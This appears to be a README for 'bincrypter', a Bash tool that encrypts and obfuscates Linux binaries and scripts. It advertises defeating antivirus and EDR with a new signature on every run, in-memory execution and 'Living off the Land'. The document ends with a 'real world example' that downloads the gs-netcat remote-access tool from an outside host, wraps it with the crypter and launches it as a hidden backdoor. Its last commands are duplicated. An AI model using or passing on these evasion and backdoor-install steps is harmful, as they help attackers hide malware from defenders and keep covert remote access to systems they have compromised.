bincrypter: A Linux Binary Runtime Crypter
bincrypter – Pack/Encrypt/Obfuscate ELF + SHELL scripts
A Linux Binary Runtime Crypter – in BASH!
Features
- Obfuscates & encrypts any ELF binary or
#!-script - AV/EDR death: Morphing + different signature every time
- 100% in-memory. No temporary files.
- Not soiling the filesystem
- Can double or triple encrypt the same binary (or itself)
- Resulting binary is heavily obfuscated (
stringonly shows garbage) - Living off the Land: Only needs /bin/sh + perl + openssl
- Architecture agnostic: Works on x86_64, aarch64, arm6, mips, …
Download
curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh
chmod +x bincrypter.sh
Example:
cp /usr/bin/id id
./bincrypter.sh id
# Compressed: 68552 –> 24176 [35%]
./id
# uid=0(root) gid=0(root) groups=0(root)
Set a custom PASSWORD (optionally):
cp /usr/bin/id id
./bincrypter.sh id foobar
# Compressed: 68552 –> 23860 [34%]
./id
# Enter Password: foobar
# uid=0(root) gid=0(root) groups=0(root)
Real world example (install a backdoor with a unique signature):
curl -SsfL “https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)” | PASSWORD=”foobar” ./bincrypter.sh >gsnc
chmod +x gsnc
PASSWORD=”foobar” GS_ARGS=”-ilD -s ChangeMe” ./gsnc
chmod +x gsnc
PASSWORD=”foobar” GS_ARGS=”-ilD -s ChangeMe” ./gsnc
